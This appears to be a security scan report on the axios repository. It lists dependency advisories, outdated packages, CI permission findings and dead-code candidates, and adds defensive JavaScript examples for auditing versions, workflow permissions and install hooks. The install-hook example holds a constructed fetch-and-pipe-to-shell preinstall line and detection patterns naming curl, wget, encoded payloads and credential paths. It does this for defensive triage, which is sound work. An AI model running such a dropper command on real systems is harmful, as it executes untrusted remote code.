medium Legacy software dependency conf 0.90 npm package `formidable` is 1 major version(s) behind (2.1.2 -> 3.5.4)
`formidable` is pinned/resolved at 2.1.2 but the latest stable release on the npm registry is 3.5.4 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `get-stream` is 3 major version(s) behind (6.0.1 -> 9.0.1)
`get-stream` is pinned/resolved at 6.0.1 but the latest stable release on the npm registry is 9.0.1 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `gulp` is 1 major version(s) behind (4.0.2 -> 5.0.1)
`gulp` is pinned/resolved at 4.0.2 but the latest stable release on the npm registry is 5.0.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `proxy-from-env` is 1 major version(s) behind (1.1.0 -> 2.1.0)
`proxy-from-env` is pinned/resolved at 1.1.0 but the latest stable release on the npm registry is 2.1.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
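The fifteen findings above all come from one signal: the resolved version's major number compared with the registry's latest. A practitioner usually wants to reproduce that signal locally and gate on it in CI rather than wait for Dependabot. The following is an added example in JavaScript (the project's own language); it is not Repobility's detector and not axios's code. It consumes data shaped like the output of `npm outdated --json`; the sample input is constructed from the current/latest pairs reported on this page, plus one hypothetical up-to-date entry, and nothing in it contacts the registry.

```javascript
// Added example, not code from Repobility or from axios: reproduce the
// "N major version(s) behind" signal from data shaped like `npm outdated --json`
// and turn it into a CI gate. The sample below is constructed from the
// current/latest pairs reported on this page; nothing here queries the registry.

const outdatedSample = {
  '@rollup/plugin-commonjs': { current: '15.1.0', latest: '29.0.3' },
  'body-parser':             { current: '1.20.3', latest: '2.2.2' },
  'follow-redirects':        { current: '1.15.11', latest: '1.16.0' },
  'fs-extra':                { current: '11.2.0', latest: '11.3.5' },
  'already-current':         { current: '^3.4.0', latest: '3.4.0' }, // hypothetical, up to date
};

// Minimal semver parse: optional ^ ~ = v prefix, MAJOR.MINOR.PATCH, optional
// pre-release/build suffix. Anything else (ranges like ">=1 <2") is rejected
// rather than guessed at, since a wrong gap would silently pass the gate.
function parseSemver(version) {
  const m = /^[\^~=v]?\s*(\d+)\.(\d+)\.(\d+)(?:[-+].*)?$/.exec(String(version).trim());
  if (!m) throw new Error(`unparseable version: ${version}`);
  return { major: +m[1], minor: +m[2], patch: +m[3] };
}

// Severity as the scan assigns it: any major gap is medium, a minor/patch gap
// is low, and an up-to-date pin produces no finding.
function classifyCurrency(current, latest) {
  const c = parseSemver(current);
  const l = parseSemver(latest);
  const majorsBehind = l.major - c.major;
  if (majorsBehind > 0) return { majorsBehind, severity: 'medium' };
  if (majorsBehind < 0) return { majorsBehind: 0, severity: 'none' }; // pinned ahead of "latest", e.g. a pre-release
  const behind = l.minor > c.minor || (l.minor === c.minor && l.patch > c.patch);
  return { majorsBehind: 0, severity: behind ? 'low' : 'none' };
}

// One row per outdated package, largest major gap first: those are the
// upgrades that need migration work, so they should be scheduled, not ignored.
function currencyReport(outdated) {
  return Object.entries(outdated)
    .map(([name, { current, latest }]) => ({ name, current, latest, ...classifyCurrency(current, latest) }))
    .filter(row => row.severity !== 'none')
    .sort((a, b) => b.majorsBehind - a.majorsBehind);
}

// CI gate: names of packages more than `maxMajors` majors behind.
// An empty array means the tree is within policy.
function exceedsPolicy(outdated, maxMajors) {
  return currencyReport(outdated)
    .filter(row => row.majorsBehind > maxMajors)
    .map(row => row.name);
}

// Example run (feed real data with: npm outdated --json > outdated.json)
for (const row of currencyReport(outdatedSample)) {
  console.log(`${row.severity.padEnd(6)} ${row.name}: ${row.current} -> ${row.latest} (${row.majorsBehind} major)`);
}
```

In a real pipeline the hand-written parser would be replaced by the `semver` package (`semver.major()` and `semver.diff()` cover the same cases, ranges included); it is inlined here only so the block runs with no dependencies. The useful part is the policy: a threshold on majors behind, applied per dependency group, stops the list above from growing silently while leaving the team free to batch the migrations.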
medium Legacy software dependency conf 0.88 picomatch: GHSA-3v7f-55p6-f55p
Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching. Note that this and the other advisories below are resolved from package-lock.json, which is the development tree; axios's published runtime dependencies are `follow-redirects`, `form-data` and `proxy-from-env`, so a consumer of the npm package is only exposed to an advisory whose package is among those or their transitive dependencies.
package-lock.json · dependency · legacy
medium Legacy quality quality conf 0.78 Public web service has no security.txt
security.txt gives researchers and customers a safe disclosure channel. Public web apps and APIs should publish it under /.well-known/security.txt. As a client library the npm package has no web endpoint of its own; the finding applies only to a site built from this repository, such as the docs/ package, and the equivalent channel for the library itself is the repository's security policy.
.well-known/security.txt · quality · legacy
medium Legacy software dependency conf 0.88 qs: GHSA-6rw7-vpxm-498p
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 qs: GHSA-q8mj-m7cp-5q26
qs has a remotely triggerable DoS: qs.stringify crashes with TypeError on null/undefined entries in comma-format arrays when encodeValuesOnly is set
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 request: GHSA-p8p7-x288-28g6
Server-Side Request Forgery in Request
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 serialize-javascript: GHSA-76p7-773f-r4q5
Cross-site Scripting (XSS) in serialize-javascript
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 serialize-javascript: GHSA-qj8w-gfj5-8c6v
Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 tar: GHSA-f5x3-32g6-xq36
Denial of service while parsing a tar file due to lack of folders count validation
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 tough-cookie: GHSA-72xf-g2v4-qvf3
tough-cookie Prototype Pollution vulnerability
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 uuid: GHSA-w5hq-g745-h8pq
uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 vm2: GHSA-2cm2-m3w5-gp2f
vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 vm2: GHSA-9g8x-92q2-p28f
NodeVM observability builtins leak host process and HTTP request data
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 vm2: GHSA-mpf8-4hx2-7cjg
vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 vm2: GHSA-v27g-jcqj-v8rw
vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 vm2: GHSA-wp5r-2gw5-m7q7
vm2's Transformer Fast-Path Bypass Exposes Internal State Variable
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 ws: GHSA-58qx-3vcg-4xpx
ws: Uninitialized memory disclosure
package-lock.json · dependency · legacy
medium 9-layer cicd supply-chain conf 1.00 GitHub Actions workflow grants broad write permissions
CI tokens with write permissions increase blast radius when an action, dependency, or PR workflow is compromised. Prefer job-level least-privilege permissions: declare `permissions: {}` (or `contents: read`) at the workflow level so every job starts with nothing, then grant `contents: write`, `id-token: write` or similar scopes only on the job that actually needs them, typically the one that publishes. A compromised build or test step in the same workflow then holds a read-only token.
.github/workflows/release-branch.yml · supply-chain · github-actions · least-privilege
medium 9-layer cicd supply-chain conf 1.00 GitHub Actions workflow grants broad write permissions
CI tokens with write permissions increase blast radius when an action, dependency, or PR workflow is compromised. Prefer job-level least-privilege permissions.
.github/workflows/publish.yml · supply-chain · github-actions · least-privilege
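The two findings above distinguish a write grant at the workflow level (every job inherits it) from one scoped to a single job. The following added example, in JavaScript and not part of Repobility's engine or the axios repository, shows both shapes side by side and a small check that tells them apart without a YAML library. Both workflow texts are constructed for the example and are not the contents of axios's release-branch.yml or publish.yml; the parser understands only the block-style `permissions:` mappings shown, not YAML anchors or flow-style maps.

```javascript
// Added example, not Repobility's or axios's code: find GitHub Actions
// permission grants without a YAML library and report whether any write scope
// is granted at the workflow level (broad) rather than on a job (scoped).
// Both workflow texts below are constructed for the example; they are not the
// contents of axios's release-branch.yml or publish.yml.

const WEAK_WORKFLOW = `
name: publish
on:
  push:
    tags: ['v*']
permissions:            # workflow level: every job, including build, gets these
  contents: write
  id-token: write
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts && npm test
  publish:
    runs-on: ubuntu-latest
    needs: build
    steps:
      - run: npm publish --provenance
`;

const HARDENED_WORKFLOW = `
name: publish
on:
  push:
    tags: ['v*']
permissions: {}         # nothing by default; each job declares what it needs
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts && npm test
  publish:
    runs-on: ubuntu-latest
    needs: build
    permissions:
      contents: write   # create the release
      id-token: write   # OIDC token for npm provenance
    steps:
      - run: npm publish --provenance
`;

const WRITE_VALUES = ['write', 'write-all'];

// Strip a trailing YAML comment and split "key: value" into [key, value].
function keyValue(line) {
  const noComment = line.split('#')[0];
  const sep = noComment.indexOf(':');
  if (sep < 0) return [noComment.trim(), ''];
  return [noComment.slice(0, sep).trim(), noComment.slice(sep + 1).trim()];
}

// Lines nested under the mapping that starts at `start` (deeper indentation),
// blank and comment-only lines skipped.
function nestedLines(lines, start) {
  const baseIndent = lines[start].search(/\S/);
  const out = [];
  for (let i = start + 1; i < lines.length; i++) {
    const line = lines[i];
    if (!line.trim() || line.trim().startsWith('#')) continue;
    if (line.search(/\S/) <= baseIndent) break;
    out.push(line);
  }
  return out;
}

// Scope -> value for one `permissions:` entry. Scalars (`write-all`, `read-all`)
// apply to every scope and are reported under '*'; `{}` grants nothing.
function parsePermissions(lines, idx) {
  const [, scalar] = keyValue(lines[idx]);
  if (scalar === '{}') return {};
  if (scalar) return { '*': scalar };
  const perms = {};
  for (const line of nestedLines(lines, idx)) {
    const [scope, value] = keyValue(line);
    if (scope) perms[scope] = value;
  }
  return perms;
}

// Every permissions block that grants a write scope, with its level.
// Column-0 blocks are workflow-wide; anything indented belongs to a job.
function auditWorkflow(yamlText) {
  const lines = yamlText.split('\n');
  const findings = [];
  lines.forEach((line, i) => {
    if (!/^\s*permissions\s*:/.test(line)) return;
    const perms = parsePermissions(lines, i);
    const writes = Object.keys(perms).filter(scope => WRITE_VALUES.includes(perms[scope]));
    if (writes.length === 0) return;
    findings.push({ line: i + 1, level: line.search(/\S/) === 0 ? 'workflow' : 'job', writes });
  });
  return findings;
}

// The condition this page's finding describes: a write grant at workflow level.
function grantsBroadWrite(yamlText) {
  return auditWorkflow(yamlText).some(f => f.level === 'workflow');
}

console.log('weak:', auditWorkflow(WEAK_WORKFLOW));
console.log('hardened:', auditWorkflow(HARDENED_WORKFLOW));
```

The hardened text is the change the finding asks for: `permissions: {}` at the top, `contents: read` on the build job, and the two write scopes confined to the publish job. A workflow with no `permissions:` key at all inherits the repository's default token permissions, which the check above does not model; treat a missing block as needing the same explicit `{}`.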
medium 9-layer security coverage conf 1.00 No auth library detected
The scanner did not find any standard auth library (JWT, OAuth, NextAuth, Auth0, etc.). Either auth lives in custom code, in a separate service, or is missing. For an HTTP client library this is the expected outcome: axios forwards credentials it is handed (the `auth` request option, an `Authorization` header) but does not implement authentication itself, so this entry is a coverage note rather than a gap to fix.
coverage · auth
low Legacy software dependency conf 0.88 brace-expansion: GHSA-v6h2-p8h4-qcjw
brace-expansion Regular Expression Denial of Service vulnerability
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.88 diff: GHSA-73rr-hh4g-fpgx
jsdiff has a Denial of Service vulnerability in parsePatch and applyPatch
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.88 elliptic: GHSA-848j-6mx2-7j84
Elliptic Uses a Cryptographic Primitive with a Risky Implementation
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.88 es5-ext: GHSA-4gmj-3p3h-gm8h
es5-ext vulnerable to Regular Expression Denial of Service in `function#copy` and `function#toStringTokens`
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.88 formidable: GHSA-75v8-2h7p-7m2m
Formidable relies on hexoid to prevent guessing of filenames for untrusted executable content
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.88 handlebars: GHSA-442j-39wm-28r2
Handlebars.js has a Property Access Validation Bypass in container.lookup
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.88 ip: GHSA-78xj-cgh5-2h22
NPM IP package incorrectly identifies some private IP addresses as public
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.90 npm package `@babel/core` is minor version(s) behind (7.23.9 -> 7.29.7)
`@babel/core` is pinned/resolved at 7.23.9 but the latest stable release on the npm registry is 7.29.7 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json · dependency · legacy
low Legacy software dependency conf 0.90 npm package `@babel/preset-env` is minor version(s) behind (7.23.9 -> 7.29.7)
`@babel/preset-env` is pinned/resolved at 7.23.9 but the latest stable release on the npm registry is 7.29.7 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json · dependency · legacy
low Legacy software dependency conf 0.90 npm package `auto-changelog` is minor version(s) behind (2.4.0 -> 2.6.0)
`auto-changelog` is pinned/resolved at 2.4.0 but the latest stable release on the npm registry is 2.6.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json · dependency · legacy
low Legacy software dependency conf 0.90 npm package `follow-redirects` is minor version(s) behind (1.15.11 -> 1.16.0)
`follow-redirects` is pinned/resolved at 1.15.11 but the latest stable release on the npm registry is 1.16.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise. `follow-redirects` is a runtime dependency of axios (it implements redirect following for the Node http adapter), so consumers inherit whichever version their lockfile resolves within axios's declared range; a minor gap here is worth more attention than the same gap in a build tool.
package.json · dependency · legacy
low Legacy software dependency conf 0.90 npm package `fs-extra` is minor version(s) behind (11.2.0 -> 11.3.5)
`fs-extra` is pinned/resolved at 11.2.0 but the latest stable release on the npm registry is 11.3.5 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json · dependency · legacy
low Legacy software dependency conf 0.88 qs: GHSA-w7fw-mjwx-w883
qs's arrayLimit bypass in comma parsing allows denial of service
package-lock.json · dependency · legacy
low Legacy quality quality conf 0.74 robots.txt does not advertise a sitemap
Sitemap directives in robots.txt help crawlers and AI agents find the canonical public URL inventory quickly.
README.md · quality · legacy
low Legacy software dependency conf 0.88 semver-regex: GHSA-4x5v-gmq8-25ch
Regular expression denial of service in semver-regex
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.88 tmp: GHSA-52f5-9888-hmc6
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
package-lock.json · dependency · legacy
low Legacy software dependency conf 0.88 vm2: GHSA-q3fm-4wcw-g57x
vm2 setup-sandbox.js violates Defense Invariant #11 in stack-trace formatter
package-lock.json · dependency · legacy
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: eslint.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file. This file and the test files flagged below are expected to look this way: a config module exports an object, and a test file registers its cases through framework callbacks rather than named declarations, so the absence of top-level symbols is not evidence of dead code. Treat these as false positives unless a file is also unreferenced by any config, import or test runner.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/browser/cancelToken.browser.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/browser/isURLSameOrigin.browser.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/browser/settle.browser.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/browser/toFormData.browser.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/cjs/tests/helpers/cjs-is-cancel-typing.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/cjs/tests/helpers/ts-require-default.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/cjs/tests/helpers/ts-require.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/tests/fixture-cleanup.module.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/tests/helpers/esm-functions.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/tests/ts.module.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/tests/typings.module.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/vitest.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/setup/browser.setup.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/smoke/deno/tests/import.smoke.test.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/smoke/esm/tests/http2.smoke.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/smoke/esm/tests/import.smoke.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/smoke/esm/vitest.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/api.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/cancel/canceledError.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/cancel/isCancel.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/composeSignals.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/core/buildFullPath.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/core/transformData.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/estimateDataURLDecodedBytes.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/fromDataURI.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/bind.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/combineURLs.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/formDataToJSON.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/isAbsoluteURL.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/isAxiosError.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/parseHeaders.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/progressEventReducer.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/spread.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/validator.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/parseProtocol.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/platform.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/query.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/regression.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/transformResponse.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/endsWith.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/forEach.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/isX.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/kindOf.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/kindOfTest.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/merge.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/toArray.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/toFlatObject.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/trim.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: vitest.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer quality integrity conf 1.00 Legacy-named symbol `FormDataLegacy` in tests/unit/adapters/http.test.js:24
Names with suffixes like `_old`, `_v1`, `_deprecated` usually indicate replaced-but-not-removed code (typical AI-coder leftover). Confirm and delete, or rename if it's the active version. In a test file a name like this may be a deliberate alias that distinguishes an older FormData implementation from the native one so both can be exercised, so check where it is imported from before deleting.
integrity · legacy-marker · dead-code
low 9-layer cicd supply-chain conf 1.00 package.json defines install-time lifecycle scripts
preinstall/install/postinstall/prepare scripts execute during dependency installation. Review them carefully for network calls, obfuscation, shell execution, or credential access.
package.json · supply-chain · npm · install-scripts
low 9-layer cicd supply-chain conf 1.00 package.json defines install-time lifecycle scripts
preinstall/install/postinstall/prepare scripts execute during dependency installation. Review them carefully for network calls, obfuscation, shell execution, or credential access.
docs/package.json · supply-chain · npm · install-scripts
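The two findings above say what to look for in install-time hooks but not how to do it across many manifests. The following added example, written in JavaScript and not taken from Repobility or from axios, lists the hooks npm runs during `npm install` and flags the patterns the finding names (network calls, shell execution, encoded payloads, credential paths) plus one the finding leaves implicit: a hook that just runs a local file, which moves the real behaviour somewhere the reviewer has to go and read. The manifest is constructed for the example and is not axios's package.json or docs/package.json.

```javascript
// Added example, not Repobility's or axios's code: list the lifecycle scripts
// that run at `npm install` time and flag the patterns a reviewer should
// look at first. The manifest is constructed for the example; it is not
// axios's package.json or docs/package.json.

const manifestSample = {
  name: 'example-lib',
  scripts: {
    build: 'rollup -c',
    test: 'mocha',
    prepare: 'husky',                                      // hook bootstrap: runs on install, nothing suspicious
    postinstall: 'node ./scripts/setup.js',                // runs repo code at install time: read that file
    preinstall: 'curl -s https://example.invalid/x | sh',  // constructed dropper shape: network + shell
  },
};

// Hooks npm runs during `npm install` / `npm ci`, in execution order.
// `prepublish` is the deprecated legacy name that still fires on install.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepublish', 'prepare'];

// Patterns worth a manual look. Each is a hint, not a verdict: a build tool
// can legitimately fetch, and a dropper can avoid every one of these.
const RISKY_PATTERNS = [
  { flag: 'network access',   re: /\b(curl|wget)\b|https?:\/\// },
  { flag: 'pipes to shell',   re: /\|\s*(sh|bash|zsh)\b/ },
  { flag: 'inline code',      re: /\bnode\s+(-e|--eval)\b|\beval\(/ },
  { flag: 'encoded payload',  re: /base64|atob\(|\\x[0-9a-f]{2}/i },
  { flag: 'credential paths', re: /\.npmrc|\.ssh|NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET/ },
];

// `node some/file.js` in a hook means the real behaviour lives in that file,
// so the reviewer has to open it; capture the path.
const LOCAL_SCRIPT = /\bnode\s+((?:\.\/)?[\w./-]+\.[cm]?js)\b/;

// One entry per install-time hook present in the manifest, in the order npm
// runs them, with the flags that matched its command.
function triageInstallScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter(hook => Object.prototype.hasOwnProperty.call(scripts, hook))
    .map(hook => {
      const command = String(scripts[hook]);
      const flags = RISKY_PATTERNS.filter(p => p.re.test(command)).map(p => p.flag);
      const local = LOCAL_SCRIPT.exec(command);
      if (local) flags.push(`runs local script: ${local[1]}`);
      return { hook, command, flags };
    });
}

// Hooks that need a human decision before this package is installed with
// scripts enabled. Empty means "only unflagged hooks", not "safe".
function hooksNeedingReview(pkg) {
  return triageInstallScripts(pkg).filter(e => e.flags.length > 0).map(e => e.hook);
}

for (const entry of triageInstallScripts(manifestSample)) {
  console.log(`${entry.hook}: ${entry.command}`);
  for (const flag of entry.flags) console.log(`  - ${flag}`);
}
```

Whatever the triage says, CI that only needs to build and test the repository can run `npm ci --ignore-scripts` (or set `ignore-scripts=true` in `.npmrc`) so that neither the project's own hooks nor those of its dependencies execute on the runner; the hooks are then reviewed once, by a person, rather than trusted on every checkout. A `prepare` hook in a library repository commonly bootstraps git hooks or builds the package from a git checkout, which is legitimate but still runs arbitrary code, so the point of the triage is to make that code visible, not to approve it.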
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — docs/scripts/utils.js:4
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — examples/post/server.js:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — examples/postMultipartFormData/server.js:5
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — examples/server.js:193
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — examples/upload/server.js:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-quality · fq.console-leak
